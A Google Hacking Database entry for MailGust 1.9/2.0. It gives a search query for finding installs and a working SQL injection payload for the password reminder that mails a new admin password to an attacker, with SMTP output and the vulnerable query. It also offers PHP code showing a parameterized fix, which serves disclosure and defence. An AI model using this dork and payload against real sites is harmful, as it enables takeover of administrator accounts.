GHDB « Hackers For Charity

GHDB


Google Search: “powered by mailgust”

rgod rates this entry 10 out of 10.
Submitted: 2005-09-26 00:00:00
Added by: rgod
Hits: 1231
Score: 10

MailGust 1.9/2.0 (possibly prior versions) SQL injection / board takeover

software:
site: http://www.mailgust.org/
description: Mailgust is three pieces of software in one:
  * Mailing list manager
  * Newsletter distribution tool
  * Message Board
Mailgust is written in PHP and uses a MySQL database.

vulnerability:
if magic quotes off -> SQL Injection

Without having an account, a user can send himself a new admin password using the password reminder. In the email field, type:

    [your_email],'or'a'='a'/*@hotmail.com

Take a look at what happens:

    220 [MAILSERVER] SMTP Service ready
    HELO [MAILGUST]
    250 [MAILSERVER].
    MAIL FROM:
    250 MAIL FROM: OK
    RCPT TO:<[your_email]>
    250 RCPT TO:>[your_email] OK
    RCPT TO:<'or'a'='a'/*@hotmail.com>
    250 RCPT TO:<'or'a'='a'/*@hotmail.com> OK
    DATA
    354 Start mail input; end with .
    Date: Sat, 24 Sep 2005 16:11:38 +0100
    Subject: New password
    To: [your_email],'or'a'='a'/*@hotmail.com
    From: systemxxx@localhost.com
    Your login name is: [admin_email]
    Your new password is: 4993587
    Click here:
    http://localhost/mailgust/index.php?method=activate_new_password&list=maillistuser&pwd=4993587&id=1756185114
    to activate the password, than try to log in!
    It is recommended that you change your password afterwards.
    .
    250 <4335105B00009AE2> Mail accepted
    QUIT
    221 [MAILSERVER] QUIT

The vulnerable query is in [path_to_mailgust]/gorum/user_email.php at line 363:

    …
    $query = "SELECT * FROM $applName"."_$userClassName ".
             "WHERE email='$this->email'";
    …

It becomes:

    SELECT * FROM maillist_maillistuser WHERE email='[your_email],'or'a'='a'/*@hotmail.com'

"or'a'='a'" is always true, so the query is always true and the script doesn't fail. For the mail function, these are two valid email addresses, so it will send the mail to [your_email] and to 'or'a'='a'/*@hotmail.com ;)

Activate the password; now you can log in with [admin_email] as user and the new password.

You can find my PoC exploit here: http://rgod.altervista.org/maildisgust.html
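
The query pattern quoted above next to a hardened form, as an added example that is not MailGust's code and not part of the original entry: the address is validated as a single recipient, bound as a query parameter, and the reminder is addressed to the email stored in the matched row. The function names, the sample rows and the in-memory SQLite database (standing in for MailGust's MySQL database) are assumptions made so the example runs offline.

```php
<?php
declare(strict_types=1);
// Added example, not MailGust code. The table name follows the query quoted above;
// the in-memory SQLite database and its rows are constructed for the demo.

function open_demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE maillist_maillistuser (id INTEGER PRIMARY KEY, email TEXT)');
    $db->exec("INSERT INTO maillist_maillistuser (email)
               VALUES ('admin@example.org'), ('user@example.org')");
    return $db;
}

// Before: input spliced into the SQL text, the pattern in the quoted query.
function lookup_interpolated(PDO $db, string $email): array {
    $query = "SELECT * FROM maillist_maillistuser WHERE email='$email'";
    return $db->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// After: the value is bound as data, and only a unique match is accepted.
function lookup_bound(PDO $db, string $email): ?array {
    // Accept exactly one syntactically valid address; a comma-separated value
    // fails here. Apostrophes are legal in addresses, so this check alone
    // is not the SQL injection fix: the bound parameter below is.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, email FROM maillist_maillistuser WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
    return count($rows) === 1 ? $rows[0] : null;
}

// The reminder is addressed to the email stored in the matched row,
// never to the string the visitor typed into the form.
function reminder_recipient(PDO $db, string $submitted): ?string {
    $row = lookup_bound($db, $submitted);
    return $row === null ? null : $row['email'];
}

$db = open_demo_db();
$input = "someone@example.org,'or'a'='a'/*@hotmail.com"; // shape of the value quoted above
printf("interpolated lookup matched %d row(s)\n", count(lookup_interpolated($db, $input)));
var_dump(reminder_recipient($db, $input));
var_dump(reminder_recipient($db, 'user@example.org'));
```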


Comments:


5 Responses to “GHDB”

  1. Jack says:

    Does GHDB still get updates for now?

  2. Johnny says:

    The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.

  3. The Artist says:

    Hi Johnny, been a while since I came here last. Aren’t you gonna update this website anymore???

  4. Johnny says:

    The GHDB is not updated and lives with the exploitdb: http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!

  5. Velmurugan says:

    Are any offline viewable resources available for this product?
